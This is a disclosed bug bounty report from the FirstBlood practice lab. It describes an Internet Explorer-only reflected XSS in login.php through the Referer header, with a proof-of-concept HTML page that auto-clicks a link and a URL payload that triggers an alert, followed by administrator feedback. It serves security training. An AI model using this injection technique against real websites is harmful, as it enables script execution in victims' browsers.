FirstBlood-#596 — IE-only Reflected XSS
This issue was discovered on FirstBlood v2
On 2021-10-26, r0x61tremy Level 3 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
BugBountyHunter Membership
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Steps for reproduce
- Start the server on the
localhost.
- Create an html file (example
evil_site.html) with the following contents:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="referrer" content="unsafe-url"/>
<title></title>
</head>
<body>
<a id=1 href="https://6e90100d97de-r0x61tremy.a.firstbloodhackers.com/login.php"></a>
<script type="text/javascript">
document.getElementById(1).click();
</script>
</body>
</html>
- Save the file in the directory on
localhost.
- In the Internet Explorer browser, follow the link ```http://localhost/evil_site.html?asd='/onclick=alert(document.domain)/'
- You will be redirected to the page
https://6e90100d97de-r0x61tremy.a.firstbloodhackers.com/login.php.
- Click
Return to previous page. You will see the alert box with document.domain.
P.S. This vulnerability only works in the IE browser
P3 Medium
Endpoint: /login.php
Parameter: href
Payload: '/onclick=alert()/'
FirstBlood ID: 19
Vulnerability Type: Reflective XSS
The parameter ?ref= on login.php was fixed and instead the use of $_SERVER['HTTP_REFERER']; was used. Patrice tested in Chrome and Firefox and saw it was secure, but some users still use Internet Explorer 10 (governments for example!) and the Referer header is vulnerable to reflective XSS.
Report Feedback
Creator & Administrator
Nice find, thanks for providing a working PoC and mentioning it only works on IE. Some users reported that the referrer was vulnerable but the payload provided wouldn't work, and no mention of browser. Great work